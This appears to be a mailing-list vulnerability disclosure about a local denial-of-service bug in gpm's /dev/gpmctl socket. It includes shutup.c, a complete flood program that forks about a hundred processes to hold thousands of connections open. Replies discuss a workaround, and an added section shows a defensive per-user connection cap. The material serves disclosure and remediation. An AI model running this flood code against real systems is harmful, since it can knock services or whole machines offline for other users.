Hello. There is a bug in gpm similar to the sysklogd one. It listens on /dev/gpmctl and uses STREAM. Any user can simply DoS gpm and (in several circumstances) the whole system. Below is sample code to DoS gpm. I couldn't write an exploit to ALWAYS crash the whole system, but I did it a few times. I don't know why it works and why not. I think that you are much better programmers than I, so you can do it yourself :) If I write a working exploit I will NOT publish it, so don't worry.

Solutions? I'm not sure if STREAM is needed by gpm. Maybe DGRAM would be a good solution for that? Or maybe some changes of permissions on /dev/gpmctl?

Best regards.

Tomasz Grabowski
(0-91)4333950
Akademickie Centrum Informatyki
cadence.pl

-------------------------------------------------------------------------

Below is shutup.c, written by someone else. I made only a few little changes to work with gpm.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

#define PATH "/dev/gpmctl"
#define SHUTUPS 2000
#define PROCS 100

int main (void)
{
  int s, i;
  struct sockaddr_un sun;
  char host[128];

  sun.sun_family = AF_UNIX;
  strncpy (sun.sun_path, PATH, 100);
  gethostname (host, 128);

  /* Detach from the terminal; the parent exits, the child carries on. */
  if (fork ())
    exit (0);

  /* Spawn PROCS children; each child leaves this loop and floods on its own,
     and the parent floods too once it has forked them all. */
  for (i = 0; i < PROCS; i++)
    if (fork () == 0)
      break;

  /* Open SHUTUPS connections to the gpm control socket and keep them open.
     A failed connect() is retried (i--) rather than counted. */
  for (i = 0; i < SHUTUPS; i++)
    {
      if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
          perror ("socket");
          while (1);
        }
      if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0)
        {
          perror ("connect");
          close (s);
          i--;
        }
    }

  /* Never exit, so every connection stays open on the gpm side. */
  while (1);
}
gpm does need STREAM. There's no easy fix for this one. If you change permissions on /dev/gpmctl, you lose functionality. The quick fix is to just rm /dev/gpmctl. This will prevent things like gpm-root from working, but basic gpm functionality is still there. I'm looking at it to see if/how it can be fixed without losing functionality.
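Added example, not code from the thread above and not gpm's own fix: one way a daemon can keep a STREAM socket on /dev/gpmctl open to every user and still survive a flood like shutup.c is to ask the kernel who is connecting (SO_PEERCRED, Linux-specific) and refuse a connection once that uid already holds a fixed number of them. The daemon's descriptor usage is then bounded no matter how many connections one user opens, while ordinary clients are unaffected. The socket path (/tmp/gpmctl-example.sock), the limits and the function names are assumptions made for this illustration; flood_and_count() plays both attacker and server in one process so the example runs without a real gpm.

```c
#define _GNU_SOURCE          /* struct ucred / SO_PEERCRED on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Hypothetical limits for this example, not values from gpm. */
#define MAX_CONN_PER_UID 4
#define MAX_CLIENTS 64

struct client { int fd; uid_t uid; };

struct server {
    int listen_fd;
    struct client clients[MAX_CLIENTS];
    int nclients;
};

/* Count live connections currently held by one uid. */
static int conns_for_uid(const struct server *s, uid_t uid) {
    int n = 0;
    for (int i = 0; i < s->nclients; i++)
        if (s->clients[i].uid == uid) n++;
    return n;
}

static void fill_addr(struct sockaddr_un *sun, const char *path) {
    memset(sun, 0, sizeof *sun);
    sun->sun_family = AF_UNIX;
    strncpy(sun->sun_path, path, sizeof sun->sun_path - 1);
}

/* Bind and listen on an AF_UNIX stream socket at path. Returns 0 or -1. */
int server_listen(struct server *s, const char *path) {
    struct sockaddr_un sun;
    fill_addr(&sun, path);
    unlink(path);                      /* remove a stale socket file */
    s->listen_fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (s->listen_fd < 0) return -1;
    if (bind(s->listen_fd, (struct sockaddr *)&sun, sizeof sun) < 0) return -1;
    if (listen(s->listen_fd, 16) < 0) return -1;
    s->nclients = 0;
    return 0;
}

/* Accept one pending connection and apply the per-uid cap.
   Returns 1 if admitted, 0 if refused (and closed), -1 on error. */
int server_accept_one(struct server *s) {
    int fd = accept(s->listen_fd, NULL, NULL);
    if (fd < 0) return -1;
    struct ucred cr;
    socklen_t len = sizeof cr;
    /* The kernel reports the peer's uid; it cannot be forged by the client. */
    if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &len) < 0) { close(fd); return -1; }
    if (conns_for_uid(s, cr.uid) >= MAX_CONN_PER_UID || s->nclients >= MAX_CLIENTS) {
        close(fd);                     /* refused: the daemon keeps no descriptor */
        return 0;
    }
    s->clients[s->nclients].fd = fd;
    s->clients[s->nclients].uid = cr.uid;
    s->nclients++;
    return 1;
}

/* Open n client connections from this process (all one uid, like shutup.c)
   and return how many the server admitted. Everything is cleaned up after. */
int flood_and_count(const char *path, int n) {
    struct server s;
    struct sockaddr_un sun;
    int client_fds[256], opened = 0, admitted = 0;
    if (n > 256) n = 256;
    if (server_listen(&s, path) < 0) return -1;
    fill_addr(&sun, path);
    for (int i = 0; i < n; i++) {
        int c = socket(AF_UNIX, SOCK_STREAM, 0);
        if (c < 0) break;
        /* connect() completes once queued in the backlog, before accept(). */
        if (connect(c, (struct sockaddr *)&sun, sizeof sun) < 0) { close(c); break; }
        client_fds[opened++] = c;
        if (server_accept_one(&s) == 1) admitted++;
    }
    for (int i = 0; i < opened; i++) close(client_fds[i]);
    for (int i = 0; i < s.nclients; i++) close(s.clients[i].fd);
    close(s.listen_fd);
    unlink(path);
    return admitted;
}

int main(void) {
    int admitted = flood_and_count("/tmp/gpmctl-example.sock", 20);
    printf("20 connections attempted from one uid, %d admitted\n", admitted);
    return admitted < 0;
}
```

The cap only bounds what the daemon holds; the attacker's own sockets still count against their per-process limit and the kernel's file table, so this stops the daemon from running out of descriptors but is not a substitute for sane system-wide limits. It also does nothing against a flood spread over many uids, and a real daemon would want an idle timeout on admitted clients as well.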
Fixed.